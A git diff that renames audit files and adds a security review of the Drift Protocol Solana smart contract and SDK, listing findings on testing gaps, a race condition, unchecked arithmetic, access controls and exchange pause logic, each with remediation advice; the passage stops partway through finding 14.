findings_newupdate/2022-10-GSquared-securityreview.txt rename to findings_newupdate/tob/2022-10-GSquared-securityreview.txt diff --git a/findings_newupdate/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.txt b/findings_newupdate/tob/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.txt similarity index 100% rename from findings_newupdate/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.txt rename to findings_newupdate/tob/2022-10-fraxfinance-fraxlend-fraxferry-securityreview.txt diff --git a/findings_newupdate/tob/2022-11-folksfinance-securityreview.txt b/findings_newupdate/tob/2022-11-folksfinance-securityreview.txt new file mode 100644 index 0000000..bb94104 Binary files /dev/null and b/findings_newupdate/tob/2022-11-folksfinance-securityreview.txt differ diff --git a/findings_newupdate/2022-11-optimism-securityreview.txt b/findings_newupdate/tob/2022-11-optimism-securityreview.txt similarity index 100% rename from findings_newupdate/2022-11-optimism-securityreview.txt rename to findings_newupdate/tob/2022-11-optimism-securityreview.txt diff --git a/findings_newupdate/2022-12-curl-securityreview.txt b/findings_newupdate/tob/2022-12-curl-securityreview.txt similarity index 100% rename from findings_newupdate/2022-12-curl-securityreview.txt rename to 
findings_newupdate/tob/2022-12-curl-securityreview.txt diff --git a/findings_newupdate/tob/2022-12-driftlabs-driftprotocol-securityreview.txt b/findings_newupdate/tob/2022-12-driftlabs-driftprotocol-securityreview.txt new file mode 100644 index 0000000..05a6736 --- /dev/null +++ b/findings_newupdate/tob/2022-12-driftlabs-driftprotocol-securityreview.txt @@ -0,0 +1,20 @@ +1. Lack of build instructions Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-DRIFT-1 Target: README.md Description The Drift Protocol repository does not contain instructions to build, compile, test, or run the project. The project’s README should include at least the following information: ● Instructions for building the project ● Instructions for running the built artifacts ● Instructions for running the project’s tests The closest thing we have found to build instructions appears in a script in the drift-sim repository (figure 1.1). As shown in the figure below, building the project is non-trivial. Users should not be required to rediscover these steps on their own. git submodule update --init --recursive # build v2 cd driftpy/protocol-v2 yarn && anchor build # build dependencies for v2 cd deps/serum-dex/dex && anchor build && cd ../../.. # go back to top-level cd ../../ Figure 1.1: drift-sim/setup.sh Additionally, the project relies on serum-dex , which currently has an open issue regarding outdated build instructions. Thus, if a user visits the serum-dex repository to learn how to build the dependency, they will be misled. Exploit Scenario Alice attempts to build and deploy her own copy of the Drift Protocol smart contract. Without instructions, Alice deploys it incorrectly. Users of Alice’s copy of the smart contract suffer financial loss. Recommendations Short term, add the minimal information listed above to the project’s README . This will help users to build, run, and test the project. Long term, as the project evolves, ensure that the README is updated. This will help ensure that the README does not communicate incorrect information to users. References ● Documentation points to do.sh +2. Inadequate testing Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-DRIFT-2 Target: .github/workflows/main.yml , test-scripts/run-anchor-tests.sh Description The Anchor tests are not run as part of Drift Protocol’s CI process. Moreover, the script responsible for running the Anchor tests does not run all of them. Integrating all Anchor tests into the CI process and updating the script so it runs all tests will help ensure they are run regularly and consistently. Figure 2.1 shows a portion of the project’s main GitHub workflow, which runs the project’s unit tests. However, the file makes no reference to the project’s Anchor tests. - name: Run unit tests run: cargo test --lib # run unit tests Figure 2.1: .github/workflows/main.yml#L52–L53 Furthermore, the script used to run the Anchor tests runs only some of them. The relevant part of the script appears in figure 2.2. The test_files array contains the names of nearly all of the files containing tests in the tests directory. However, the array lacks the following entries, and consequently does not run their tests: ● ksolver.ts ● tokenFaucet.ts test_files=( postOnlyAmmFulfillment.ts imbalancePerpPnl.ts ... # 42 entries cancelAllOrders.ts ) Figure 2.2: test-scripts/run-anchor-tests.sh#L7–L53 Exploit Scenario Alice, a Drift Protocol developer, unwittingly introduces a bug into the codebase.
The bug would be revealed by the Anchor tests. However, because the Anchor tests are not run in CI, the bug goes unnoticed. Recommendations Short term: ● Adjust the main GitHub workflow so that it runs the Anchor tests. ● Adjust the run-anchor-tests.sh script so that it runs all Anchor tests (including those in ksolver.ts and tokenFaucet.ts ). Taking these steps will help to ensure that all Anchor tests are run regularly and consistently. Long term, revise the run-anchor-tests.sh script so that the test_files array is not needed. Move files that do not contain tests into a separate directory, so that only files containing tests remain. Then, run the tests in all files in the tests directory. Adopting such an approach will ensure that newly added tests are automatically run. +3. Invalid audit.toml prevents cargo audit from being run Severity: Informational Difficulty: High Type: Auditing and Logging Finding ID: TOB-DRIFT-3 Target: audit.toml Description The project’s audit.toml file contains an invalid key. This makes running cargo audit on the project impossible. The relevant part of the audit.toml file appears in figure 3.1. The packages key is unrecognized by cargo audit . As a result, cargo audit produces the error in figure 3.2 when run on the protocol-v2 repository. [packages] source = "all" # "all", "public" or "local" Figure 3.1: .cargo/audit.toml#L27–L28 error: cargo-audit fatal error: parse error: unknown field `packages`, expected one of `advisories`, `database`, `output`, `target`, `yanked` at line 30 column 1 Figure 3.2: Error produced by cargo audit when run on the protocol-v2 repository Exploit Scenario A vulnerability is discovered in a protocol-v2 dependency. A RUSTSEC advisory is issued for the vulnerability, but because cargo audit cannot be run on the repository, the vulnerability goes unnoticed. Users suffer financial loss. Recommendations Short term, either remove the packages table from the audit.toml file or replace it with a table recognized by cargo audit . In the project’s current state, cargo audit cannot be run on the project. Long term, regularly run cargo audit in CI and verify that it runs to completion without producing any errors or warnings. This will help the project receive the full benefits of running cargo audit by identifying dependencies with RUSTSEC advisories. +4. Race condition in Drift SDK Severity: Undetermined Difficulty: Low Type: Undefined Behavior Finding ID: TOB-DRIFT-4 Target: sdk directory Description A race condition in the Drift SDK causes client programs to operate on non-existent or possibly stale data. The race condition affects many of the project’s Anchor tests, making them unreliable. Use of the SDK in production could have financial implications. When running the Anchor tests, the error in figure 4.1 appears frequently. The data field that the error refers to is read by the getUserAccount function (figure 4.2). This function tries to read the data field from a DataAndSlot object obtained by calling getUserAccountAndSlot (figure 4.3). That DataAndSlot object is set by the handleRpcResponse function (figure 4.4). TypeError: Cannot read properties of undefined (reading 'data') at User.getUserAccount (sdk/src/user.ts:122:56) at DriftClient.getUserAccount (sdk/src/driftClient.ts:663:37) at DriftClient.
(sdk/src/driftClient.ts:1005:25) at Generator.next () at fulfilled (sdk/src/driftClient.ts:28:58) at processTicksAndRejections (node:internal/process/task_queues:96:5) Figure 4.1: Error that appears frequently when running the Anchor tests public getUserAccount(): UserAccount { return this.accountSubscriber.getUserAccountAndSlot().data; } Figure 4.2: sdk/src/user.ts#L121–L123 public getUserAccountAndSlot(): DataAndSlot { this.assertIsSubscribed(); return this.userDataAccountSubscriber.dataAndSlot; } Figure 4.3: sdk/src/accounts/webSocketUserAccountSubscriber.ts#L72–L75 handleRpcResponse(context: Context, accountInfo?: AccountInfo): void { ... if (newBuffer && (!oldBuffer || !newBuffer.equals(oldBuffer))) { this.bufferAndSlot = { buffer: newBuffer, slot: newSlot, }; const account = this.decodeBuffer(newBuffer); this.dataAndSlot = { data: account, slot: newSlot, }; this.onChange(account); } } Figure 4.4: sdk/src/accounts/webSocketAccountSubscriber.ts#L55–L95 If a developer calls getUserAccount but handleRpcResponse has not been called since the last time the account was updated, stale data will be returned. If handleRpcResponse has never been called for the account in question, an error like that shown in figure 4.1 arises. Note that a developer can avoid the race by calling WebSocketAccountSubscriber.fetch (figure 4.5). However, the developer must manually identify locations where such calls are necessary. Errors like the one shown in figure 4.1 appear frequently when running the Anchor tests, which suggests that identifying such locations is nontrivial. async fetch(): Promise<void> { const rpcResponse = await this.program.provider.connection.getAccountInfoAndContext( this.accountPublicKey, (this.program.provider as AnchorProvider).opts.commitment ); this.handleRpcResponse(rpcResponse.context, rpcResponse?.value); } Figure 4.5: sdk/src/accounts/webSocketAccountSubscriber.ts#L46–L53 We suspect this problem applies not just to user accounts, but to any account fetched via a subscription mechanism (e.g., state accounts or perp market accounts). Note that despite the apparent race condition, Drift Protocol states that the tests run reliably for them. Exploit Scenario Alice, unaware of the race condition, writes client code that uses the Drift SDK. Alice’s code unknowingly operates on stale data and proceeds with a transaction, believing it will result in financial gain. However, when processed with actual on-chain data, the transaction results in financial loss for Alice. Recommendations Short term, rewrite all account getter functions so that they automatically call WebSocketAccountSubscriber.fetch . This will eliminate the need for developers to deal with the race manually. Long term, investigate whether using a subscription mechanism is actually needed. Another Solana RPC call could solve the same problem yet be more efficient than a subscription combined with a manual fetch. +5. Loose size coupling between function invocation and requirement Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-DRIFT-5 Target: programs/drift/src/state/events.rs Description The implementation of the emit_stack function relies on the caller to use a sufficiently large buffer space to hold a Base64-encoded representation of the discriminator along with the serialized event. Failure to provide sufficient space will result in an out-of-bounds attempt on either the write operation or the base64::encode_config_slice call.
emit_stack::<_, 424>(order_action_record); Figure 5.1: programs/drift/src/controller/orders.rs#L545 pub fn emit_stack (event: T ) { let mut data_buf = [0u8; N]; let mut out_buf = [0u8; N]; emit_buffers(event, &mut data_buf[..], &mut out_buf[..]) } pub fn emit_buffers ( event: T, data_buf: &mut [u8], out_buf: &mut [u8], ) { let mut data_writer = std::io::Cursor::new(data_buf); data_writer .write_all(&::discriminator()) .unwrap(); borsh::to_writer(&mut data_writer, &event).unwrap(); let data_len = data_writer.position() as usize; let out_len = base64::encode_config_slice( &data_writer.into_inner()[0..data_len], base64::STANDARD, out_buf, ); let msg_bytes = &out_buf[0..out_len]; let msg_str = unsafe { std::str::from_utf8_unchecked(msg_bytes) }; msg!(msg_str); } Figure 5.2: programs/drift/src/state/events.rs#L482–L511 Exploit Scenario A maintainer of the smart contract is unaware of this implicit size requirement and adds a call to emit_stack using too small a buffer, or changes are made to a type without a corresponding change to all places where emit_stack uses that type. If the changed code is not covered by tests, the problem will manifest during contract operation, and could cause an instruction to panic, thereby reverting the transaction. Recommendations Short term, add a size constant to the type, and calculate the amount of space required for the respective buffers from it. This ensures that a change to a type’s size is propagated to every location that allocates buffers for it. Long term, create a trait to be used by the types with which emit_stack is intended to work. This can be used to handle the size of the type, and also any other future requirement for types used by emit_stack .
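As a sketch of that recommendation, the buffer sizes could hang off the event type itself instead of being repeated at each call site. The trait, type, and sizes below are illustrative stand-ins rather than the Drift codebase's actual definitions:

// Hypothetical sketch: tie buffer sizes to the event type via a trait so
// emit_stack call sites cannot drift out of sync with the type's layout.

/// Implemented by every event type that emit_stack is intended to work with.
trait EmittableEvent {
    /// Size of the 8-byte discriminator plus the Borsh-serialized payload.
    const SERIALIZED_LEN: usize;
    /// Base64 output needs 4 bytes for every 3 input bytes, rounded up.
    const ENCODED_LEN: usize = (Self::SERIALIZED_LEN + 2) / 3 * 4;
}

struct OrderActionRecord; // stand-in for the real event struct

impl EmittableEvent for OrderActionRecord {
    const SERIALIZED_LEN: usize = 8 + 304; // illustrative, not the real size
}

fn main() {
    // Buffers are now sized from the type; changing the struct requires
    // updating SERIALIZED_LEN in exactly one place.
    println!(
        "data buffer: {} bytes, base64 buffer: {} bytes",
        OrderActionRecord::SERIALIZED_LEN,
        OrderActionRecord::ENCODED_LEN
    );
}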
+6. The zero-copy feature in Anchor is experimental Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-DRIFT-6 Target: State structs Description Several structs for keeping state use Anchor’s zero-copy functionality. The Anchor documentation states that this is still an experimental feature that should be used only when Borsh serialization cannot be used without hitting the stack or heap limits. Exploit Scenario The Anchor framework has a bug in the zero-copy feature, or updates it with a breaking change, in a way that affects the security model of the Drift smart contract. An attacker discovers this problem and leverages it to steal funds from the contract. #[account(zero_copy)] #[derive(Default, Eq, PartialEq, Debug)] #[repr(C)] pub struct User { pub authority: Pubkey, pub delegate: Pubkey, pub name: [u8; 32], pub spot_positions: [SpotPosition; 8], pub perp_positions: [PerpPosition; 8], pub orders: [Order; 32], pub last_add_perp_lp_shares_ts: i64, pub total_deposits: u64, pub total_withdraws: u64, pub total_social_loss: u64, // Fees (taker fees, maker rebate, referrer reward, filler reward) and pnl for perps pub settled_perp_pnl: i64, // Fees (taker fees, maker rebate, filler reward) for spot pub cumulative_spot_fees: i64, pub cumulative_perp_funding: i64, pub liquidation_margin_freed: u64, // currently unimplemented pub liquidation_start_ts: i64, // currently unimplemented pub next_order_id: u32, pub max_margin_ratio: u32, pub next_liquidation_id: u16, pub sub_account_id: u16, pub status: UserStatus, pub is_margin_trading_enabled: bool, pub padding: [u8; 26], } Figure 6.1: Example of a struct using zero copy Recommendations Short term, evaluate if it is possible to move away from using zero copy without hitting the stack or heap limits, and do so if possible. Not relying on experimental features reduces the risk of exposure to bugs in the Anchor framework. Long term, adopt a conservative stance by using stable versions of packages and features. This reduces both risk and time spent on maintaining compatibility with code still in flux. +7. Hard-coded indices into account data Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-DRIFT-7 Target: perp_market_map.rs, spot_market_map.rs Description The implementations for both PerpMarketMap and SpotMarketMap use hard-coded indices into the accounts data in order to retrieve the market_index property without having to deserialize all the data. // market index 1160 bytes from front of account let market_index = u16::from_le_bytes(*array_ref![data, 1160, 2]); Figure 7.1: programs/drift/src/state/perp_market_map.rs#L110–L111 let market_index = u16::from_le_bytes(*array_ref![data, 684, 2]); Figure 7.2: programs/drift/src/state/spot_market_map.rs#L174 Exploit Scenario Alice, a Drift Protocol developer, changes the layout of the structure or the width of the market_index property but fails to update one or more of the hard-coded indices. Mallory notices this bug and finds a way to use it to steal funds. Recommendations Short term, add consts that include the value of the indices and the type size. Also add comments explaining the calculation of the values. This ensures that updating the constants keeps all code that relies on them reading the correct part of the underlying data. Long term, add an implementation to the struct to unpack the market_index from the serialized state. This reduces the maintenance burden of updating the code that accesses data in this way.
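A minimal sketch of the short-term recommendation follows, assuming an illustrative layout: the offset is derived from named constants and documented once, and read_market_index is a hypothetical accessor so callers no longer embed magic numbers:

use std::mem::size_of;

/// Anchor account discriminator size.
const DISCRIMINATOR_LEN: usize = 8;
/// Byte offset of market_index inside a serialized PerpMarket account.
/// Deriving the value keeps the constant honest when the layout changes.
const PERP_MARKET_INDEX_OFFSET: usize = DISCRIMINATOR_LEN + 1152; // = 1160
const MARKET_INDEX_LEN: usize = size_of::<u16>();

/// Single accessor for the raw field.
fn read_market_index(data: &[u8]) -> Option<u16> {
    let bytes = data.get(PERP_MARKET_INDEX_OFFSET..PERP_MARKET_INDEX_OFFSET + MARKET_INDEX_LEN)?;
    Some(u16::from_le_bytes(bytes.try_into().ok()?))
}

fn main() {
    let mut account = vec![0u8; 2048];
    account[PERP_MARKET_INDEX_OFFSET..PERP_MARKET_INDEX_OFFSET + MARKET_INDEX_LEN]
        .copy_from_slice(&7u16.to_le_bytes());
    assert_eq!(read_market_index(&account), Some(7));
}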
+8. Missing verification of maker and maker_stats accounts Severity: Undetermined Difficulty: Medium Type: Data Validation Finding ID: TOB-DRIFT-8 Target: programs/drift/src/instructions/user.rs Description The handle_place_and_take_perp_order and handle_place_and_take_spot_order functions retrieve two additional accounts that are passed to the instruction: maker and maker_stats . However, there is no check that the two accounts are linked (i.e., that their authority is the same). Due to time constraints, we were unable to determine the impact of this finding. pub fn get_maker_and_maker_stats<'a>( account_info_iter: &mut Peekable>>, ) -> DriftResult<(AccountLoader<'a, User>, AccountLoader<'a, UserStats>)> { let maker_account_info = next_account_info(account_info_iter).or(Err(ErrorCode::MakerNotFound))?; validate!( maker_account_info.is_writable, ErrorCode::MakerMustBeWritable )?; let maker: AccountLoader = AccountLoader::try_from(maker_account_info).or(Err(ErrorCode::CouldNotDeserializeMaker))?; let maker_stats_account_info = next_account_info(account_info_iter).or(Err(ErrorCode::MakerStatsNotFound))?; validate!( maker_stats_account_info.is_writable, ErrorCode::MakerStatsMustBeWritable )?; let maker_stats: AccountLoader = AccountLoader::try_from(maker_stats_account_info) .or(Err(ErrorCode::CouldNotDeserializeMakerStats))?; Ok((maker, maker_stats)) } Figure 8.1: programs/drift/src/instructions/optional_accounts.rs#L47–L74 Exploit Scenario Mallory passes two unlinked accounts of the correct type in the places for maker and maker_stats , respectively. This causes the contract to operate outside of its intended use. Recommendations Short term, add a check that the two accounts have the same authority. Long term, place all code for authenticating accounts at the front of instruction handlers. This increases the clarity of the checks and helps with auditing the authentication. +9. Panics used for error handling Severity: Informational Difficulty: High Type: Error Reporting Finding ID: TOB-DRIFT-9 Target: Various files in programs/drift Description In several places, the code panics when an arithmetic overflow or underflow occurs. Panics should be reserved for programmer errors (e.g., assertion violations). Panicking on user errors dilutes the utility of the panic operation. An example appears in figure 9.1. The adjust_amm function uses both the question mark operator ( ? ) and unwrap to handle errors resulting from “peg” related calculations. An overflow or underflow could result from an invalid input to the function. An error should be returned in such cases. budget_delta_peg = budget_i128 .safe_add(adjustment_cost.abs())? .safe_mul(PEG_PRECISION_I128)? .safe_div(per_peg_cost)?; budget_delta_peg_magnitude = budget_delta_peg.unsigned_abs(); new_peg = if budget_delta_peg > 0 { ... } else if market.amm.peg_multiplier > budget_delta_peg_magnitude { market .amm .peg_multiplier .safe_sub(budget_delta_peg_magnitude) .unwrap() } else { 1 }; Figure 9.1: programs/drift/src/math/repeg.rs#L349–L369 Running Clippy with the following command identifies 66 locations in the drift package where expect or unwrap is used: cargo clippy -p drift -- -A clippy::all -W clippy::expect_used -W clippy::unwrap_used Many of those uses appear to be related to invalid input. Exploit Scenario Alice, a Drift Protocol developer, observes a panic in the Drift Protocol codebase. Alice ignores the panic, believing that it is caused by user error, but it is actually caused by a bug she introduced. Recommendations Short term, reserve the use of panics for programmer errors. Have relevant areas of the code return Result::Err on user errors. Adopting such a policy will help to distinguish the two types of errors when they occur. Long term, consider denying the following Clippy lints: ● clippy::expect_used ● clippy::unwrap_used ● clippy::panic Although this will not prevent all panics, it will prevent many of them.
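A minimal sketch of the short-term recommendation, using stand-ins for the codebase's DriftResult and ErrorCode types: the fallible subtraction from figure 9.1 surfaces an error instead of unwrapping:

#[derive(Debug)]
enum ErrorCode {
    MathError,
}

type DriftResult<T> = Result<T, ErrorCode>;

/// Instead of peg_multiplier.safe_sub(delta).unwrap(), propagate the error
/// so an invalid input cannot cause a panic.
fn new_peg(peg_multiplier: u128, budget_delta_peg_magnitude: u128) -> DriftResult<u128> {
    if peg_multiplier > budget_delta_peg_magnitude {
        peg_multiplier
            .checked_sub(budget_delta_peg_magnitude)
            .ok_or(ErrorCode::MathError)
    } else {
        Ok(1)
    }
}

fn main() {
    assert!(matches!(new_peg(100, 40), Ok(60)));
    assert!(matches!(new_peg(40, 100), Ok(1)));
}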
+10. Testing code used in production Severity: Undetermined Difficulty: Undetermined Type: Patching Finding ID: TOB-DRIFT-10 Target: programs/drift/src/state/{oracle_map.rs, perp_market.rs} Description In some locations in the Drift Protocol codebase, testing code is mixed with production code with no way to discern between them. Testing code should be clearly indicated as such and guarded by #[cfg(test)] to avoid being called in production. Examples appear in figures 10.1 and 10.2. The OracleMap struct has a quote_asset_price_data field that is used only when get_price_data is passed a default Pubkey . Similarly, the AMM implementation contains functions that are used only for testing and are not guarded by #[cfg(test)] . pub struct OracleMap<'a> { oracles: BTreeMap >, price_data: BTreeMap, pub slot: u64, pub oracle_guard_rails: OracleGuardRails, pub quote_asset_price_data: OraclePriceData, } impl<'a> OracleMap<'a> { ... pub fn get_price_data(&mut self, pubkey: &Pubkey) -> DriftResult<&OraclePriceData> { if pubkey == &Pubkey::default() { return Ok(&self.quote_asset_price_data); } Figure 10.1: programs/drift/src/state/oracle_map.rs#L22–L47 impl AMM { pub fn default_test() -> Self { let default_reserves = 100 * AMM_RESERVE_PRECISION; // make sure tests dont have the default sqrt_k = 0 AMM { Figure 10.2: programs/drift/src/state/perp_market.rs#L490–L494 Drift Protocol has indicated that the quote_asset_price_data field (figure 10.1) is used in production. This raises concerns because there is currently no way to set the contents of this field, and no asset’s price is perfectly constant (e.g., even stablecoins’ prices fluctuate). For this reason, we have changed this finding’s severity from Informational to Undetermined. Exploit Scenario Alice, a Drift Protocol developer, introduces code that calls the default_test function, not realizing it is intended only for testing. Alice introduces a bug as a result. Recommendations Short term, to the extent possible, avoid mixing testing and production code by, for example, using separate data types and storing the code in separate files. When testing and production code must be mixed, clearly mark the testing code as such, and guard it with #[cfg(test)] . These steps will help to ensure that testing code is not deployed in production. Long term, as new code is added to the codebase, ensure that the aforementioned standards are maintained. Testing code is not typically held to the same standards as production code, so it is more likely to include bugs.
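A minimal sketch of the short-term recommendation with an illustrative struct: once the test-only constructor is guarded by #[cfg(test)], any production call becomes a compile error rather than a latent bug:

pub struct Amm {
    pub sqrt_k: u128,
}

impl Amm {
    /// Production constructor.
    pub fn new(sqrt_k: u128) -> Self {
        Amm { sqrt_k }
    }

    /// Compiled only under `cargo test`.
    #[cfg(test)]
    pub fn default_test() -> Self {
        Amm { sqrt_k: 100 }
    }
}

#[cfg(test)]
mod tests {
    use super::Amm;

    #[test]
    fn default_test_is_only_visible_to_tests() {
        assert_eq!(Amm::default_test().sqrt_k, 100);
    }
}

fn main() {
    let amm = Amm::new(1);
    println!("sqrt_k = {}", amm.sqrt_k);
}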
+11. Inconsistent use of checked arithmetic Severity: Undetermined Difficulty: Undetermined Type: Data Validation Finding ID: TOB-DRIFT-11 Target: Various files in programs/drift Description In several locations, the Drift Protocol codebase uses unchecked arithmetic. For example, in calculate_margin_requirement_and_total_collateral_and_liability_info (figure 11.1), the variable num_perp_liabilities is used as an operand in both a checked and an unchecked operation. To protect against overflows and underflows, unchecked arithmetic should be used sparingly. num_perp_liabilities += 1; } with_isolated_liability &= margin_requirement > 0 && market.contract_tier == ContractTier::Isolated; } if num_spot_liabilities > 0 { validate!( margin_requirement > 0, ErrorCode::InvalidMarginRatio, "num_spot_liabilities={} but margin_requirement=0", num_spot_liabilities )?; } let num_of_liabilities = num_perp_liabilities.safe_add(num_spot_liabilities)?; Figure 11.1: programs/drift/src/math/margin.rs#L499–L515 Note that adding the following to the crate root will cause Clippy to fail the build whenever unchecked arithmetic is used: #![deny(clippy::integer_arithmetic)] Exploit Scenario Alice, a Drift Protocol developer, unwittingly introduces an arithmetic overflow bug into the codebase. The bug would have been revealed by the use of checked arithmetic. However, because unchecked arithmetic is used, the bug goes unnoticed. Recommendations Short term, add the #![deny(clippy::integer_arithmetic)] attribute to the drift crate root. Add #[allow(clippy::integer_arithmetic)] in rare situations where code is performance critical and its safety can be guaranteed through other means. Taking these steps will reduce the likelihood of overflow or underflow bugs residing in the codebase. Long term, if additional Solana programs are added to the codebase, ensure the #![deny(clippy::integer_arithmetic)] attribute is also added to them. This will reduce the likelihood that newly introduced crates contain overflow or underflow bugs.
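A minimal sketch combining the recommended crate-root lint with a checked helper in the style of the codebase's safe_add (the SafeMath trait here is an illustrative stand-in):

#![deny(clippy::integer_arithmetic)] // the crate-root attribute from the recommendation

type DriftResult<T> = Result<T, &'static str>;

trait SafeMath: Sized {
    fn safe_add(self, rhs: Self) -> DriftResult<Self>;
}

impl SafeMath for u64 {
    fn safe_add(self, rhs: Self) -> DriftResult<Self> {
        self.checked_add(rhs).ok_or("math overflow")
    }
}

fn main() -> DriftResult<()> {
    // Under the lint, `num_perp_liabilities += 1` is rejected by Clippy;
    // the checked equivalent reports overflow as an error instead.
    let mut num_perp_liabilities: u64 = 0;
    num_perp_liabilities = num_perp_liabilities.safe_add(1)?;
    println!("{num_perp_liabilities}");
    Ok(())
}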
+12. Inconsistent and incomplete exchange status checks Severity: Medium Difficulty: High Type: Access Controls Finding ID: TOB-DRIFT-12 Target: programs/drift/src/instructions/{admin.rs, keeper.rs, user.rs}, programs/drift/src/state/state.rs Description Drift Protocol’s representation of the exchange’s status has several problems: ● The exchange’s status is represented using an enum, which does not allow more than one individual operation to be paused (figures 12.1 and 12.2). As a result, an administrator could inadvertently unpause one operation by trying to pause another (figure 12.3). ● The ExchangeStatus variants do not map cleanly to exchange operations. For example, handle_transfer_deposit checks whether the exchange status is WithdrawPaused (figure 12.4). The function’s name suggests that the function checks whether “transfers” or “deposits” are paused. ● The ExchangeStatus is checked in multiple inconsistent ways. For example, in handle_update_funding_rate (figure 12.5), both an access_control attribute and the body of the function include a check for whether the exchange status is FundingPaused . pub enum ExchangeStatus { Active, FundingPaused, AmmPaused, FillPaused, LiqPaused, WithdrawPaused, Paused, } Figure 12.1: programs/drift/src/state/state.rs#L36–L44 #[account] #[derive(Default)] #[repr(C)] pub struct State { pub admin: Pubkey, pub whitelist_mint: Pubkey, ... pub exchange_status: ExchangeStatus, pub padding: [u8; 17], } Figure 12.2: programs/drift/src/state/state.rs#L8–L33 pub fn handle_update_exchange_status( ctx: Context, exchange_status: ExchangeStatus, ) -> Result<()> { ctx.accounts.state.exchange_status = exchange_status; Ok(()) } Figure 12.3: programs/drift/src/instructions/admin.rs#L1917–L1923 #[access_control( withdraw_not_paused(&ctx.accounts.state) )] pub fn handle_transfer_deposit( ctx: Context, market_index: u16, amount: u64, ) -> anchor_lang::Result<()> { Figure 12.4: programs/drift/src/instructions/user.rs#L466–L473 #[access_control( market_valid(&ctx.accounts.perp_market) funding_not_paused(&ctx.accounts.state) valid_oracle_for_perp_market(&ctx.accounts.oracle, &ctx.accounts.perp_market) )] pub fn handle_update_funding_rate( ctx: Context, perp_market_index: u16, ) -> Result<()> { ... let is_updated = controller::funding::update_funding_rate( perp_market_index, perp_market, &mut oracle_map, now, &state.oracle_guard_rails, matches!(state.exchange_status, ExchangeStatus::FundingPaused), None, )?; ... } Figure 12.5: programs/drift/src/instructions/keeper.rs#L1027–L1078 The Medium post describing the incident that occurred around May 11, 2022 suggests that the exchange’s pausing mechanisms contributed to the incident’s subsequent fallout: The protocol did not have a kill-switch where only withdrawals were halted. The protocol was paused in the second pause to prevent a further drain of user funds… This suggests that the pausing mechanisms should receive heightened attention to reduce the damage should another incident occur. Exploit Scenario Mallory tricks an administrator into pausing funding after withdrawals have already been paused. By pausing funding, the administrator unwittingly unpauses withdrawals. Recommendations Short term: ● Represent the exchange’s status as a set of flags. This will allow individual operations to be paused independently of one another. ● Ensure exchange statuses map cleanly to the operations that can be paused. Add documentation where there is potential for confusion. This will help ensure developers check the proper exchange statuses. ● Adopt a single approach for checking the exchange’s status and apply it consistently throughout the codebase. If an exception must be made for a check, explain why in a comment near that check. Adopting such a policy will reduce the likelihood that a missing check goes unnoticed. Long term, periodically review the exchange status checks. Since the exchange status checks represent a form of access control, they deserve heightened scrutiny. Moreover, the exchange’s pausing mechanisms played a role in past incidents.
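A minimal sketch of the flags-based representation from the short-term recommendation (a hand-rolled bitmask for illustration; the bitflags crate packages the same pattern), showing that pausing one operation no longer clears another:

#[derive(Clone, Copy, Default, Debug)]
struct ExchangeStatus(u8);

impl ExchangeStatus {
    const FUNDING_PAUSED: ExchangeStatus = ExchangeStatus(1 << 0);
    const WITHDRAW_PAUSED: ExchangeStatus = ExchangeStatus(1 << 1);

    /// Set a flag without disturbing the others.
    fn pause(&mut self, flag: ExchangeStatus) {
        self.0 |= flag.0;
    }

    fn is_paused(&self, flag: ExchangeStatus) -> bool {
        self.0 & flag.0 != 0
    }
}

fn main() {
    let mut status = ExchangeStatus::default();
    status.pause(ExchangeStatus::WITHDRAW_PAUSED);
    // Unlike assigning a single enum variant, pausing funding here
    // cannot unpause withdrawals as in the exploit scenario above.
    status.pause(ExchangeStatus::FUNDING_PAUSED);
    assert!(status.is_paused(ExchangeStatus::WITHDRAW_PAUSED));
    assert!(status.is_paused(ExchangeStatus::FUNDING_PAUSED));
}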
#[access_control(
    market_valid(&ctx.accounts.perp_market)
)]
pub fn handle_update_perp_market_expiry(
    ctx: Context,
    expiry_ts: i64,
) -> Result<()> {

Figure 13.1: programs/drift/src/instructions/admin.rs#L676–L682

pub fn handle_update_spot_market_expiry(
    ctx: Context,
    expiry_ts: i64,
) -> Result<()> {

Figure 13.2: programs/drift/src/instructions/admin.rs#L656–L660

A similar example concerning whether the exchange is paused appears in figures 13.3 and 13.4.

#[access_control(
    exchange_not_paused(&ctx.accounts.state)
)]
pub fn handle_place_perp_order(ctx: Context, params: OrderParams) -> Result<()> {

Figure 13.3: programs/drift/src/instructions/user.rs#L687–L690

pub fn handle_place_spot_order(ctx: Context, params: OrderParams) -> Result<()> {

Figure 13.4: programs/drift/src/instructions/user.rs#L1022–L1023

Exploit Scenario Mallory tricks an administrator into making a call that re-enables an expiring spot market. Mallory profits by trading against the should-be-expired spot market. Recommendations Short term, add the missing access controls to the spot market functions in admin.rs. This will ensure that an administrator cannot accidentally perform an operation on an expired spot market. Long term, add tests to verify that each function involving spot markets fails when invoked on an expired spot market. This will increase confidence that the access controls have been implemented correctly.
+14. Oracles can be invalid in at most one way Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-DRIFT-14 Target: programs/drift/src/math/oracle.rs Description The Drift Protocol codebase represents oracle validity using an enum, which does not allow an oracle to be invalid in more than one way. Furthermore, the code that determines an oracle’s validity imposes an implicit hierarchy on the ways an oracle could be invalid. This design is fragile and likely to cause future problems. The OracleValidity enum is shown in figure 14.1, and the code that determines an oracle’s validity is shown in figure 14.2. Note that if an oracle is, for example, both “too volatile” and “too uncertain,” the oracle will be labeled simply TooVolatile. A caller that does not account for this fact and simply checks whether an oracle is TooUncertain could overlook oracles that are both “too volatile” and “too uncertain.”

pub enum OracleValidity {
    Invalid,
    TooVolatile,
    TooUncertain,
    StaleForMargin,
    InsufficientDataPoints,
    StaleForAMM,
    Valid,
}

Figure 14.1: programs/drift/src/math/oracle.rs#L21–L29

pub fn oracle_validity(
    last_oracle_twap: i64,
    oracle_price_data: &OraclePriceData,
    valid_oracle_guard_rails: &ValidityGuardRails,
) -> DriftResult<OracleValidity> {
    ...
    let oracle_validity = if is_oracle_price_nonpositive {
        OracleValidity::Invalid
    } else if is_oracle_price_too_volatile {
        OracleValidity::TooVolatile
    } else if is_conf_too_large {
        OracleValidity::TooUncertain
    } else if is_stale_for_margin {
        OracleValidity::StaleForMargin
    } else if !has_sufficient_number_of_data_points {
